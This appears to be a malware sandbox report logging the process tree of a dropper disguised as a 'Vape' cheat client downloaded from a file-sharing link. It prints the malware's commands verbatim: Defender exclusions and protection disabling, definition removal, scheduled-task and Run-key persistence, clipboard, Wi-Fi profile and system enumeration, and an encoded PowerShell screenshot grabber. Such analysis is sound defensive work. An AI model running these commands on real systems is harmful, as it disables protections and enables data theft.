PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4984	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4984	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 3116	3512	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/js8e8K
2⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb058246f8,0x7ffb05824708,0x7ffb05824718
3⤵
PID:2784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
3⤵
PID:4548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
3⤵
PID:3116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
3⤵
PID:1584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
3⤵
PID:2860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
3⤵
PID:1776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
3⤵
PID:4824

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:8
3⤵
PID:4280

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
3⤵
PID:2764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
3⤵
PID:3952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
3⤵
PID:2800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
3⤵
PID:1348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1
3⤵
PID:5580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5584 /prefetch:8
3⤵
PID:5780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:1
3⤵
PID:5788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5800 /prefetch:8
3⤵
PID:5836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
3⤵
PID:5960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6448 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1388

C:\Users\Admin\Downloads\Vapev41.exe
"C:\Users\Admin\Downloads\Vapev41.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5728

C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe
"C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:5608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdateCore.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdateCore.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "GoogleUpdateCore" /tr "C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"
4⤵
- Creates scheduled task(s)
PID:6716

C:\Users\Admin\AppData\Roaming\VapeV4.exe
"C:\Users\Admin\AppData\Roaming\VapeV4.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:1124

C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe
"C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Users\Admin\AppData\Roaming\Vape Updated.exe
"C:\Users\Admin\AppData\Roaming\Vape Updated.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:5372

C:\Users\Admin\AppData\Roaming\Vape.exe
"C:\Users\Admin\AppData\Roaming\Vape.exe"
5⤵
- Executes dropped EXE
PID:2672

C:\Users\Admin\AppData\Roaming\Vape.exe
"C:\Users\Admin\AppData\Roaming\Vape.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Vape.exe'"
7⤵
PID:5648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Vape.exe'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
7⤵
PID:5660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
7⤵
PID:5728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
7⤵
PID:5212

C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1924

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c run.bat
9⤵
PID:6288

C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java -version
10⤵
PID:6920

C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
11⤵
- Modifies file permissions
PID:820

C:\Windows\system32\choice.exe
choice /c YN
10⤵
PID:6400

C:\Windows\system32\tar.exe
tar -xf oldassets.zip
10⤵
PID:4712

C:\Windows\system32\tar.exe
tar -xf newassets.zip
10⤵
PID:5592

C:\Windows\system32\tar.exe
tar -xf mappings.zip
10⤵
PID:2008

C:\Windows\system32\PING.EXE
ping localhost -n 5.5
10⤵
- Runs ping.exe
PID:3700

C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java --add-opens java.base/java.lang=ALL-UNNAMED -jar vape-loader.jar
10⤵
PID:6344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
7⤵
PID:4268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:2324

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:1388

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
7⤵
PID:5204

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
7⤵
PID:4144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:5372

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
7⤵
PID:4480

C:\Windows\system32\tree.com
tree /A /F
8⤵
PID:6440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
7⤵
PID:2300

C:\Windows\system32\netsh.exe
netsh wlan show profile
8⤵
PID:6252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
7⤵
PID:5696

C:\Windows\system32\systeminfo.exe
systeminfo
8⤵
- Gathers system information
PID:3364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
7⤵
PID:6052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACA